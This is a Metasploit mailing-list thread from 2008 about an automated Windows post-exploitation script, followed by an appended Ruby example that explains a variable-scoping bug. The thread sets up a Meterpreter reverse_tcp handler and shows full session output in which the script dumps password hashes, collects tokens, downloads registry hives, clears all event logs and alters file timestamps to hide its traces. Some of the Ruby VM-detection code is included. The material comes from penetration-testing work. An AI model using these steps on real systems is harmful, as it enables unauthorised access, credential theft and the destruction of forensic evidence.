Metasploit mailing list archives
Script for automating Information Gathering in windows Hosts
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Mon, 22 Dec 2008 19:46:45 -0400
Finally got it to work with AutoRunScript:

resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.1.108
LHOST => 192.168.1.108
resource> set LPORT 4444
LPORT => 4444
resource> set AutoRunScript /msf3/scripts/meterpreter/winenumng.rb -r -m -c
AutoRunScript => /msf3/scripts/meterpreter/winenumng.rb -r -m -c
resource> exploit
[*] Handler binding to LHOST 192.168.1.108
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Launching hidden cmd.exe...
[*] Process 3672 created.
[*] Current process is grinder.exe (1988). Migrating to 3672.
[*] Migration completed successfully.
[*] New server process: cmd.exe (3672)
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on 192.168.1.147:1079...
[*] Saving report to /tmp/192.168.1.147_20081222.441181627
[*] Checking if WIN2K301 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -na
[*] running command netstat -ns
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] Running WMIC Commands ....
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group
[*] running command wimic service list brief
[*] running command wimic volume list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
[*] Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
[*] Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
[*] Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
[*] Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
[*] Deleting left over files
[*] Clearing Event Logs, this will leave and event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.147:1079)

meterpreter >

On Sun, Dec 14, 2008 at 10:56 PM, Carlos Perez <carlos_perez at darkoperator.com> wrote:
Forgot to include the mailing list address on this one too. As you guys can see, my problem with AutoRunScript is when I have the code inside a module vs. not in a module. Any ideas on how to fix this in the code, or is it a bug in Metasploit?

---------- Forwarded message ----------
From: Carlos Perez <carlos_perez at darkoperator.com>
Date: Sun, Dec 14, 2008 at 7:07 PM
Subject: Re: [framework] Script for automating Information Gathering in windows Hosts
To: Jerome Athias <jerome.athias at free.fr>

Thanks Jerome, the problem with the AutoRunScript appears to be when I have the instructions in a Module. Example:

---------------------------------------------- works ----------------------------------------------

vmout = ''
info = client.sys.config.sysinfo
print_status "Checking if #{info['Computer']} is a Virtual Machine ........"

# Check for Windows 2003 Machines if running in VMware Workstation/Fusion
begin
	key = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS'
	root_key, base_key = client.sys.registry.splitkey(key)
	open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
	v = open_key.query_value('SystemManufacturer')
	if v.data == 'VMware, Inc.'
		print_status "\tThis is a VMware Workstation/Fusion Virtual Machine"
		vmout << "This is a VMware Workstation/Fusion Virtual Machine\n\n"
	end
rescue
	# The SystemManufacturer value is not present on every host; ignore and fall through.
end

# Registry path using the HD and CD-ROM entries in the registry in case proprietary tools are
# not installed.
key = "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0"
root_key, base_key = client.sys.registry.splitkey(key)
open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
v = open_key.query_value('Identifier')
# Note: String#grep (Ruby 1.8) returns an Array, which is truthy even when empty, so
# `if v.data.downcase.grep("vmware")` would always take the first branch; use include? instead.
if v.data.downcase.include?("vmware")
	print_status "\tThis is a VMWare virtual Machine"
	vmout << "This is a VMWare virtual Machine\n\n"
elsif v.data.downcase.include?("vbox")
	print_status "\tThis is a Sun VirtualBox virtual Machine"
	vmout << "This is a Sun VirtualBox virtual Machine\n\n"
end
puts vmout

---------------------------------------------------------------------------------------------------

If I place this inside a def vmcheck() .............. end it fails with:

[12/14/2008 19:11:12] [e(0)] core: Exception raised from handle_connection: undefined local variable or method `client' for #<#<Class:0xb6545ba8>:0xb6b3188c>
/pentest/exploits/framework3/lib/rex/script.rb:35:in `eval'
(eval):141:in `on_session'
(eval):88:in `on_session'
/pentest/exploits/framework3/lib/msf/core/handler.rb:202:in `create_session'
/pentest/exploits/framework3/lib/msf/core/payload/stager.rb:128:in `handle_connection_stage'
/pentest/exploits/framework3/lib/msf/core/payload/windows/dllinject.rb:231:in `handle_connection_stage'
/pentest/exploits/framework3/lib/msf/core/payload/stager.rb:119:in `handle_connection'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:129:in `start_handler'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `initialize'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `new'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:127:in `start_handler'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `initialize'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `new'
/pentest/exploits/framework3/lib/msf/core/handler/reverse_tcp.rb:107:in `start_handler'
/pentest/exploits/framework3/lib/msf/core/exploit.rb:401:in `setup'
/pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:173:in `job_run_proc'
/pentest/exploits/framework3/lib/msf/core/exploit_driver.rb:144:in `run'
/pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:121:in `exploit_simple'
/pentest/exploits/framework3/lib/msf/base/simple/exploit.rb:142:in `exploit_simple'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/exploit.rb:118:in `cmd_exploit'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `send'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:127:in `run'
./msfconsole:78

On Sun, Dec 14, 2008 at 9:26 PM, Jerome Athias <jerome.athias at free.fr> wrote:

Nice work
Keep it up!
/JA
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081222/8ec006b1/attachment.htm>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: winenum.tar.gz
Type: application/x-gzip
Size: 4540 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20081222/8ec006b1/attachment.bin>
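The NameError in the trace above ("undefined local variable or method `client'") is ordinary Ruby scoping: `def` starts a fresh local scope, so a local variable such as `client` from the binding a script is eval'd in is invisible inside the method body, while a lambda is a closure and still sees it. The following is an added illustration, not code from this mail or from Metasploit; `run_script` and `FakeClient` are constructed stand-ins that only model the behaviour the error message implies, not the framework's real script loader.

```ruby
# Added example: why `client` vanishes inside `def` in an eval'd script,
# and two ways around it. Everything here is a constructed stand-in.

# Stand-in for a Meterpreter client object (assumption, not the real API).
FakeClient = Struct.new(:host) do
  def sysinfo
    { 'Computer' => "WIN2K301-on-#{host}" }
  end
end

# Minimal stand-in for a script runner: the script body is eval'd in a
# binding whose *local variable* `client` holds the session. This models
# what the NameError in the thread suggests, not Metasploit's actual code.
def run_script(source, session)
  client = session # local variable visible to the eval'd body
  eval(source, binding)
end

# 1) Helper written with `def`: a new local scope, so `client` is not
#    visible inside it and the call raises NameError (the reported failure).
SCRIPT_WITH_DEF = <<~'RUBY'
  def vmcheck
    client.sysinfo['Computer']
  end
  vmcheck
RUBY

# 2) Helper written as a lambda: blocks close over the enclosing binding,
#    so `client` is captured and the lookup works.
SCRIPT_WITH_LAMBDA = <<~'RUBY'
  vmcheck = lambda { client.sysinfo['Computer'] }
  vmcheck.call
RUBY

# 3) Helper written with `def` but handed the session explicitly, which
#    is the portable fix when a real method is wanted.
SCRIPT_WITH_ARG = <<~'RUBY'
  def vmcheck_for(cli)
    cli.sysinfo['Computer']
  end
  vmcheck_for(client)
RUBY

# Run one script variant; return its result, or a one-line NameError summary.
def try_script(source)
  run_script(source, FakeClient.new('192.0.2.10'))
rescue NameError => e
  "NameError: #{e.message[/[^\n]*/]}"
end

if $PROGRAM_NAME == __FILE__
  [SCRIPT_WITH_DEF, SCRIPT_WITH_LAMBDA, SCRIPT_WITH_ARG].each { |s| puts try_script(s) }
end
```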